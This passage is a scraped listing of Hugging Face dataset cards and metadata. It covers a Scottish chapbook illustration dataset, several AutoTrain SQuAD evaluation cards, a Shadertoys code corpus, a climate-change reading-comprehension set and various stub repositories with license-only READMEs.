of the population of chapbooks as a whole. 
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page. As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection. ### Other Known Limitations Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts. ## Additional Information ### Dataset Curators - Giles Bergel - Abhishek Dutta ### Licensing Information In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain. ### Citation Information ``` bibtex @inproceedings{10.1145/3476887.3476893, author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew}, title = {Visual Analysis of Chapbooks Printed in Scotland}, year = {2021}, isbn = {9781450386906}, publisher = {Association for Computing Machinery}, address = {New York, NY, USA}, url = {https://doi.org/10.1145/3476887.3476893}, doi = {10.1145/3476887.3476893}, abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. 
A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.}, booktitle = {The 6th International Workshop on Historical Document Imaging and Processing}, pages = {67–72}, numpages = {6}, keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset}, location = {Lausanne, Switzerland}, series = {HIP '21} } ``` ### Contributions Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset.
lonestar108
null
null
null
false
1
false
lonestar108/qd50
2022-07-24T00:42:38.000Z
null
false
000fe345b3d7c2d741654a12ccbffa2a0e5beec6
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/lonestar108/qd50/resolve/main/README.md
--- license: cc-by-4.0 ---
lonestar108
null
null
null
false
1
false
lonestar108/qd100
2022-07-23T23:59:24.000Z
null
false
59b78b3485f2c9c91ebc2161cdefb94e6acaebb7
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/lonestar108/qd100/resolve/main/README.md
--- license: cc-by-4.0 ---
Gpaiva
null
null
null
false
2
false
Gpaiva/NERDE_sentences
2022-07-24T00:22:44.000Z
null
false
6aa087d61c9aa8bb123ef1d8ecaac7b1bbd55d05
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/Gpaiva/NERDE_sentences/resolve/main/README.md
--- license: cc-by-4.0 ---
Pligabue
null
null
null
false
1
false
Pligabue/BLAB_KG
2022-07-24T03:52:47.000Z
null
false
76fcebe426935e35713fd378b3de34e05581578e
[]
[ "license:mit" ]
https://huggingface.co/datasets/Pligabue/BLAB_KG/resolve/main/README.md
--- license: mit ---
apoulos
null
null
null
false
1
false
apoulos/Fork-test
2022-07-24T06:05:16.000Z
null
false
08ebcd44475da03e21fef856c051b8c98639ed6e
[]
[ "license:unknown" ]
https://huggingface.co/datasets/apoulos/Fork-test/resolve/main/README.md
--- license: unknown ---
apoulos
null
null
null
false
1
false
apoulos/GFPGAN-fork
2022-07-24T06:25:08.000Z
null
false
17a36adb411ff1fea0d7dd861faa580e7839aac2
[]
[ "license:unknown" ]
https://huggingface.co/datasets/apoulos/GFPGAN-fork/resolve/main/README.md
--- license: unknown ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556
2022-07-24T08:23:49.000Z
null
false
0bafa7af1ec5ff70f682f40196ebc18708f8d27f
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/minilm-uncased-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/minilm-uncased-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557
2022-07-24T08:25:16.000Z
null
false
0012c270d0bd91ea80c924aa6dfdf9358394daa2
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/tinyroberta-6l-768d metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/tinyroberta-6l-768d * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558
2022-07-24T08:25:57.000Z
null
false
446bb59eac4bc07d261513dd87c75cc14d00df1b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/xlm-roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/xlm-roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
rony
null
null
null
false
1
false
rony/climate-change-MRC
2022-07-25T06:14:09.000Z
null
false
4eda02d5543e62650c00f8abd5b0cc1335b03088
[]
[ "license:mit" ]
https://huggingface.co/datasets/rony/climate-change-MRC/resolve/main/README.md
--- license: mit --- The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good". If you use the dataset, cite the following paper: ``` @inproceedings{rony2022climatemrc, title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.}, author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens}, booktitle={IJCAI}, year={2022} } ```
ntmkhanh
null
null
null
false
1
false
ntmkhanh/food
2022-07-24T12:59:52.000Z
null
false
6e047a1b02a1865e862da10fde74d21396ed845d
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/ntmkhanh/food/resolve/main/README.md
--- license: apache-2.0 ---
Vipitis
null
null
null
false
13,481
false
Vipitis/Shadertoys
2022-11-05T22:50:34.000Z
null
false
039ad90d176f7f62bbd3e9a5e3c11743792da768
[]
[ "annotations_creators:no-annotation", "language:en", "language:code", "language_creators:machine-generated", "license:cc-by-nc-sa-3.0", "size_categories:10K<n<100K", "tags:code", "task_categories:text-generation", "task_categories:text-classification", "task_categories:translation" ]
https://huggingface.co/datasets/Vipitis/Shadertoys/resolve/main/README.md
--- annotations_creators: - no-annotation language: - en - code language_creators: - machine-generated license: - cc-by-nc-sa-3.0 multilinguality: [] pretty_name: Shadertoys size_categories: - 10K<n<100K source_datasets: [] tags: - code task_categories: - text-generation - text-classification - translation task_ids: [] --- # Dataset Card for Shadertoys-fine ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Source Data](#source-data) - [Licensing Information](#licensing-information) ## Dataset Description - **Repository:** https://github.com/Vipitis/project (private placeholder) ### Dataset Summary Shadertoys in the medium grained variant. Datapoints are renderpasses. ### Supported Tasks and Leaderboards `language-modeling`: The dataset can be used to train a model for modelling programming languages, which consists in building language models for programming languages. `text-classification`: The dataset can be used to classify text(title, description, comments) or code into labels like type or tags. `translation`: The Dataset can be used to translate from natural language (English) to programming language, or back. ### Languages - English (title, description, tags, comments) - Shadercode **programming** language ## Dataset Structure ### Data Instances A data point consists of the function string, it's name as well as a bit of metadata like the author and source URL. 
(in the future there might be a function string without comments) ``` { 'name': 'Image', 'type': 'image', 'code': '<full code>', 'title': '<title of the shader>', 'description': '<description of the shader>', 'tags': ['tag1','tag2','tag3', ... ], 'license': 'unknown', 'author': '<username>', 'source': 'https://shadertoy.com/view/<shaderID>' } ``` ### Data Fields - 'name' Name of the renderpass, usually Image, Buffer A, Common, etc - 'type' type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}` - 'code' the raw code (including comments) the whole renderpass. - 'title' Name of the Shader - 'description' description given for the Shader - 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags. - 'license' currently in development - 'author' username of the shader author - 'source' URL to the shader. Not to the specific renderpass. ### Data Splits Currently available (shuffled): - train (85.0%) - test (15.0%) ## Dataset Creation Data retrieved starting 2022-07-20 ### Source Data #### Initial Data Collection and Normalization All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then iterated over the items in 'renderpass' while adding some of the fields from 'info'. The code to generate these datasets will be publish on the GitHub repository in the near future. #### Who are the source language producers? Shadertoy.com contributers which publish shaders as 'public+API' ## Licensing Information The Default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached. The Dataset is currently not filtering for any licenses. A new data field is currently being developed to annotate if any other license applies to a shader.
nateraw
null
@InProceedings{huggingface:dataset, title = {A great new dataset}, author={huggingface, Inc. }, year={2020} }
This new dataset is designed to solve this great NLP task and is crafted with a lot of care.
false
1
false
nateraw/sqllitetest
2022-07-24T19:44:41.000Z
null
false
bb5c85533e51ecd070d479ccb23e10c92bed9dfe
[]
[ "license:mit" ]
https://huggingface.co/datasets/nateraw/sqllitetest/resolve/main/README.md
--- license: mit ---
nateraw
null
@InProceedings{huggingface:dataset, title = {A great new dataset}, author={huggingface, Inc. }, year={2020} }
This new dataset is designed to solve this great NLP task and is crafted with a lot of care.
false
1
false
nateraw/snowflaketest
2022-08-01T16:20:03.000Z
null
false
fbb486cd44835e75f925e1318193c0b77da9c0cc
[]
[ "license:mit" ]
https://huggingface.co/datasets/nateraw/snowflaketest/resolve/main/README.md
--- license: mit ---
devmehta787
null
null
null
false
1
false
devmehta787/wav2vec2-xlsr-hindi
2022-07-25T08:28:19.000Z
null
false
c876612cc6bf2807af9ec786b6303390d47ecd9d
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/devmehta787/wav2vec2-xlsr-hindi/resolve/main/README.md
--- license: afl-3.0 ---
Yehor
null
null
null
false
1
false
Yehor/uk-stresses
2022-07-28T13:57:39.000Z
null
false
3beff0e67d14889b60f313701a936360828e1283
[]
[ "tags:uk" ]
https://huggingface.co/datasets/Yehor/uk-stresses/resolve/main/README.md
--- tags: - uk --- This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary to be used in Text-to-Speech project based on Tacoctron 2
jack66931
null
null
null
false
1
false
jack66931/ClassTest
2022-07-24T21:30:41.000Z
null
false
cdef59ebbf0590d84506524cf199a419c036f728
[]
[ "license:unknown" ]
https://huggingface.co/datasets/jack66931/ClassTest/resolve/main/README.md
--- license: unknown ---
bongsoo
null
null
null
false
933
false
bongsoo/kowiki20220620
2022-10-05T00:08:42.000Z
null
false
47e32b8a853777f36903af82a1008f5d3f230d2a
[]
[ "language:ko", "license:apache-2.0" ]
https://huggingface.co/datasets/bongsoo/kowiki20220620/resolve/main/README.md
--- language: - ko license: apache-2.0 --- -kowiki202206 1줄 말뭉치
actdan2016
null
null
null
false
1
false
actdan2016/dandna
2022-10-13T06:39:19.000Z
null
false
f851e9309b7e3160f513f254bf9d98976d162d6c
[]
[]
https://huggingface.co/datasets/actdan2016/dandna/resolve/main/README.md
bongsoo
null
null
null
false
21
false
bongsoo/bongevalsmall
2022-10-04T23:48:22.000Z
null
false
79cedccdca57aee5a769b1898987f489c8aa3b8b
[]
[ "language:ko", "license:apache-2.0" ]
https://huggingface.co/datasets/bongsoo/bongevalsmall/resolve/main/README.md
--- language: - ko license: apache-2.0 --- - 평가 말뭉치
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559
2022-07-25T07:29:26.000Z
null
false
8e5abafb2af8f768229735214b911e7aa9c7603b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/xlm-roberta-large-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/xlm-roberta-large-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560
2022-07-25T07:33:16.000Z
null
false
a6036b2dcc7768e2940fcab790fd0a42fa5a387d
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-large-squad2 metrics: ['squad_v2'] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-large-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model.
autoevaluate
null
null
null
false
2
false
autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561
2022-07-25T09:36:36.000Z
null
false
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: Shanny/bert-finetuned-squad metrics: ['accuracy'] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: Shanny/bert-finetuned-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model.